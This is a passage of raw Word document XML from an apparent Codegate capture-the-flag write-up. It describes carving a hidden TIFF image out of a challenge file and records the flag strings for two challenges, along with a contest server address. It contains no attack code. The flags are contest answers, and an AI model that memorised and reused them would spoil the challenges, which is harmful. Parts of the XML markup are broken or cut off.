        <w:t>Answer:E5R69267</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2070" type="#_x0000_t202" style="width:437.4pt;height:69.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2070" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="002A0D27">
                  <w:r w:rsidRPr="004C534A">
                    <w:t>credentials: http://ctf.codegate.org/thisiswhereiuploadmyfiles/514985D4E9D80D8BF227859C679BFB32</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="002A0D27"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="002A0D27">
                  <w:r w:rsidRPr="004C534A">
                    <w:t>Suspects exchange the secret key through their own file. Find the key!</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="00702C97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>File seems word doc file.</w:t>
      </w:r>
      <w:r w:rsidR="002209F4">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> add</w:t>
      </w:r>
      <w:r w:rsidR="002209F4">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ed extension  and saw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> some image and text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="002209F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>We cannot find key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002209F4" w:rsidRDefault="002209F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">We checkd hex editor. We found TIFF header at </w:t>
      </w:r>
      <w:r w:rsidRPr="002209F4">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x82660</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002209F4" w:rsidRPr="002209F4" w:rsidRDefault="002209F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRPr="00702C97" w:rsidRDefault="000131C6" w:rsidP="00702C97">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="3648710"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="70" name="図 70" descr="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tiff"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5305425" cy="3648710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00702C97" w:rsidRDefault="002209F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>export tiff file and open. We can see key image like CAPTCHA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00702C97" w:rsidRPr="002209F4" w:rsidRDefault="00702C97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00702C97" w:rsidRPr="00702C97" w:rsidRDefault="00702C97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1085" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc257340763"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge13</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:800   </w:t>
      </w:r>
      <w:r>
        <w:t>Not cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Answer:PythonIsSoooSlowEvenWithPsyco.class</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2068" type="#_x0000_t202" style="width:437.4pt;height:16pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2068" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r w:rsidRPr="00921462">
                    <w:t>ctf3.codegate.org port 32121</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRPr="005E795A" w:rsidRDefault="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E795A" w:rsidRPr="005E795A" w:rsidRDefault="005E795A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E795A">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">nalysis-13 , prob13.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(attached this paper's end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E795A" w:rsidRPr="005E795A" w:rsidRDefault="005E795A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="00AA5FD6" w:rsidP="00A01E94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2067" type="#_x0000_t202" style="width:402.2pt;height:254.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2067" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>==== !!!!!! Congggggratuuulaaations!!!!! =========</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Your flag:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>PythonIsSoooSlowEvenWithPsyco.class</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>======================</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][\o/][[]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][][][][][][][]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00921462">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>][][][][][][][][][][][][]</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E795A" w:rsidRDefault="005E795A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E795A" w:rsidRDefault="005E795A">
      <w:pPr>
        <w:rPr>
